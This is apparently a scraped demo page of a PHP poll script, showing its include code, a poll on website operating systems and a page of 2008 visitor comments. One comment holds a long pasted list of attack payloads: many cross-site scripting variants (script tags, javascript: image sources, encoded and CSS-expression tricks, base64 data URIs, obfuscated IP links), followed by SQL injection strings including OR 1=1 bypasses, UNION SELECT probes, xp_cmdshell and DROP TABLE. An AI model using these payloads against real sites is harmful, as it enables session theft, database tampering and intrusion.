<?php
/* Include this before your html code */
include_once "./poll_cookie.php";
?>
<?php
/* path */
$poll_path = dirname(__FILE__);
require_once $poll_path."/include/config.inc.php";
require_once $poll_path."/include/$POLLDB[class]";
require_once $poll_path."/include/class_poll.php";
require_once $poll_path."/include/class_pollcomment.php";
$CLASS["db"] = new polldb_sql;
$CLASS["db"]->connect();
$php_poll = new pollcomment();
/* poll */
$php_poll->set_template_set("plain");
$php_poll->set_max_bar_length(125);
$php_poll->set_max_bar_height(10);
echo $php_poll->view_poll_result(1);
/* poll comments */
$php_poll->set_template("poll_comment");
$php_poll->set_comments_per_page(5);
$php_poll->set_date_format("d/m/Y H:i");
$php_poll->data_order_by("time","desc");
echo $php_poll->view_poll_comments(1);
echo $php_poll->get_comment_pages(1);
?>
|
|
|
|
Which OS is your Website running on? |
|
Linux |
40.05 % (57891) |
|
WindowsNT |
18.49 % (26725) |
|
other |
10.91 % (15768) |
|
Unix |
10.29 % (14877) |
|
FreeBSD |
8.02 % (11590) |
|
Solaris |
6.56 % (9479) |
|
BSD |
5.67 % (8200) |
Total votes:
144530 |
Send comment |
Version 2.09 |
|
1
- 30/07/2008 15:01
212.113.57.123.utel.net.ua
|
afdfd
|
|
Yoosha
Design@Yahoo.co.uk
- 25/07/2008 19:57
cache3.morva.net
|
<script>alert(document.cookie)</scri
pt>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS"
)>
<IMG SRC=`javascript:alert("XSS")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromChar
Code(88,83,83))>
<IMG SRC=javasc
;ript:a&
#108;ert('
8;SS')>
<IMG SRC=jav�
0097scr�
0105pt:�
0097ler�
0116('X�
0083S')>
<IMG SRC=javasc&#
x72ipt:al&#x
65rt('XS
3')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');"
>
<IMG SRC="jav
ascript:alert('XSS');"
>
<IMG SRC="jav
ascript:alert('XSS');"
>
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>
";' > out
<IMG SRC="  javascript:alert('XSS');">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=aler
t("XSS")>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG SRC="javascript:alert('XSS')"
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
</TITLE><SCRIPT>alert("XSS");</SCRIP
T>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')"
>
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<XSS STYLE="behavior: url(xss.htc);">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</ST
YLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
?script?alert(?XSS?)?/script?
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS
');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64
,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3Njcml
wdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XS
S');">
<IFRAME SRC="javascript:alert('XSS');"></IFR
AME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRA
MESET>
<TABLE BACKGROUND="javascript:alert('XSS')"
>
<TABLE><TD BACKGROUND="javascript:alert('XSS')"
>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\0
06C\0028'\006a\0061\0076\0061\0073\0
063\0072\0069\0070\0074\003a\0061\00
6c\0065\0072\0074\0028.1027\0058.105
3\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert(
"XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('
XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))"
>
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression
(alert("XSS"))'>
<STYLE>.XSS{background-image:url("ja
vascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url(
"javascript:alert('XSS')")}</STYLE>
<SCRIPT>alert('XSS');</SCRIPT>
<BASE HREF="javascript:alert('XSS');//">
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b7
6-0080c744f389><param name=url value=javascript:alert('XSS')></OBJE
CT>
<EMBED SRC="data:image/svg+xml;base64,PHN2Z
yB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bW
xucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRw
Oi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9
IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRl
eHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
<HTML xmlns:xss>
<xss:xss>XSS</xss:xss>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('X
SS');">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></
XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</
SCRIPT>">
<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(
'XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');
+ADw-/SCRIPT+AD4-
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93
/">XSS</A>
<A HREF="http://0102.0146.0007.00000223
/">XSS</A>
<A HREF="h
tt p://6	6.000146.0x7.147/">XSS</A>
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
' OR
' or '
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
EXEC master..xp cmdshell 'dir C:\'
'x' AND 1=(SELECT COUNT(*) FROM X); --';
'x' OR full_name LIKE '%Bob%';
UNION SELECT TOP 1 X FROM XTABLE--
SELECT userid FROM logins WHERE name='Wayne' AND password='Pirate' OR 1=1
INSERT INTO Users VALUES('neo', 'trinity')
UNION ALL SELECT field FROM table WHERE 1= 1
-1 UNION SELECT field FROM table WHERE 1= 1
;DROP TABLE X
SELECT * FROM Users WHERE User='X' AND Pass='Y'
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
SELECT TOP 1 X FROM XTABLE WHERE X='ZZZ'--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='x'--
|
|
almohasb
webmaster@almohasb.info
- 24/07/2008 16:30
host-41.232.73.174.tedata.net
|
aaaaaaaaaaaaaaa
|
|
mondke
kdjf@dk.com
- 24/07/2008 00:04
80-44-100-140.dynamic.dsl.as9105.com
|
bice comment
|
|
donald
- 23/07/2008 22:57
client-201.240.23.112.speedy.net.pe
|
hola esta es una prueba
|
|
< 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | > |
|